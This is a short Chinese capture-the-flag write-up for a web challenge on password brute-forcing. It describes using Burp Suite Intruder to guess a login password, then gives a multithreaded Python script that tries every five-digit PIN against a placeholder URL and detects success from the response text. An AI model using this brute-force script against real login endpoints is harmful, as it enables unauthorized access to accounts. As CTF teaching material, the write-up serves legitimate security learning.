xuenixiang_2018_web_baopo
解题思路:这一题还是能够get到新的知识点使用burp进行抓包处理就好了首先:打开火狐浏览器随便输入密码点击红色箭头所指的方向就好了:
接下来就是使用右边箭头所指的地方对password进行爆破处理
这个我的文笔不太好这个地方我叙述不出来只能使用图进行描述了(希望你们能够谅解)
由于使用的台式的电脑,配置还可以使用的100线程的进行爆破就好了然后开启爆破:然后可以点击Length查看哪一个返回值与其他的不同,那么这个就一定是密码了,因为就这一个成功了 这个就是密码输入进去就会得到:方法二:可以用Burp爆破
下面是个py3的脚本
import requests
import threading
psw = 0
lock = threading.RLock()
gotit = False
correct = ""
class BreakThread(threading.Thread):
def run(self):
global psw, gotit, correct
while True:
lock.acquire()
if psw > 99999 or gotit:
lock.release()
break
d = {
"pwd": str(psw).zfill(5)
}
psw = psw + 1
lock.release()
r = requests.post("http://xxxxx/baopo/?yes", data=d)
r.encoding = "utf-8"
try:
r.text.index("密码不正确")
except ValueError:
print(d["pwd"] + " right")
gotit = True
lock.acquire()
correct = d["pwd"]
lock.release()
break
else:
print(d["pwd"] + " wrong")
l = []
for i in range(2):
l.append(BreakThread())
for i in l:
i.start()
for i in l:
i.join()
print("正确密码:"+correct)
页:
[1]